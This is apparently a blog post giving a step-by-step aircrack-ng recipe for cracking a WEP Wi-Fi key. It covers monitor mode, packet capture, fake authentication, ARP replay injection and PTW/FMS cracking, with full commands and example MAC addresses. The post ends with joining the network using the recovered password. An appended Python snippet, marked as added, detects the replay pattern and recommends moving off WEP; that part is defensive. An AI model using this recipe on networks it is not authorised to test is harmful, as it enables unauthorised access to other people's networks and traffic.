WEP cracking

You need the following packages installed:

aircrack-ng

(from Synaptic or from terminal “sudo apt-get install aircrack-ng”)

Next I will give you the terminal commands – you just have to change the parts so that they reflect your situation (for example mac addresses, interfaces etc.).

The recipe

Start airmon on your wireless interface (“ip -d addr” might help if you’re not sure):

airmon-ng start wlan0

Monitoring traffic (enter number from 0 on instead of – sometimes you’ll have to backtrack here to change the channel):

airodump-ng -c , mon0

For example =11 and =00:02:72:51:DB:28 and =datel …

Monitoring specific AP traffic:
sudo airodump-ng -c --bssid 00:02:72:51:DB:28 -w wepdump -i mon0

Authentication:
sudo aireplay-ng -1 0 -e datel -a 00:02:72:51:DB:28 -h 00:11:DD:23:15:11 mon0
(-h is your personal MAC address – “ip -d link” if you don’t know)

Packet injection:
sudo aireplay-ng -3 -b 00:02:72:51:DB:28 -h 00:11:DD:23:15:11 wifi0

WEP cracking:
(a) PTW WEP-cracking method
sudo aircrack-ng -z -b 00:1A:92:77:BB:D9 wepdump*.ivs

(b) FMS/KoreK attack
sudo aircrack-ng -a 1 -0 -n 128 wepdump*.ivs

The output password will be given in a text file or on the screen. You can connect normally with it using network manager (GUI).
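
For the defending side of the packet-injection step above, this added example (not part of the original post) flags the traffic pattern that ARP-request replay produces: one station sending a burst of identical-length broadcast frames through one AP. The record layout, the window and the threshold are assumptions, and the sample frames are constructed; the AP and client addresses reuse the post's example values.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "00:02:72:51:db:28"        # example BSSID reused from the post
INJECTOR = "00:11:dd:23:15:11"  # example client MAC reused from the post
NORMAL = "00:aa:bb:cc:dd:01"    # constructed MAC for an ordinary client


def build_sample():
    """Constructed records: (time_s, bssid, src, dst, frame_len)."""
    frames = []
    # Ordinary client: occasional broadcasts of varying length.
    for i in range(10):
        frames.append((i * 0.7, AP, NORMAL, BROADCAST, 68 + (i % 3) * 20))
    # Replay pattern: one station, one length, 400 frames in under a second.
    for i in range(400):
        frames.append((3.0 + i * 0.002, AP, INJECTOR, BROADCAST, 68))
    return sorted(frames)


def detect_replay(frames, window=1.0, threshold=100):
    """Map (bssid, src) -> peak count of same-length broadcast frames seen
    within `window` seconds, for stations exceeding `threshold`.
    Both limits are assumptions to tune against your own baseline."""
    recent = defaultdict(deque)  # (bssid, src, length) -> timestamps in window
    alerts = {}
    for ts, bssid, src, dst, length in sorted(frames):
        if dst != BROADCAST:
            continue
        q = recent[(bssid, src, length)]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps older than the window
            q.popleft()
        if len(q) > threshold:
            key = (bssid, src)
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts


if __name__ == "__main__":
    for (bssid, src), peak in detect_replay(build_sample()).items():
        print(f"possible ARP replay: {src} -> {bssid}, peak {peak} frames in window")
```

An alert on a network that still runs WEP is a strong reason to move that AP to WPA2 or WPA3 rather than to tune the threshold.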

Update: if you don’t like the terminal and would prefer a GUI, I found WEPCrack, a C# Mono application, to be quite a good choice. You can see an example of its usage in this video.

Published by

metakermit
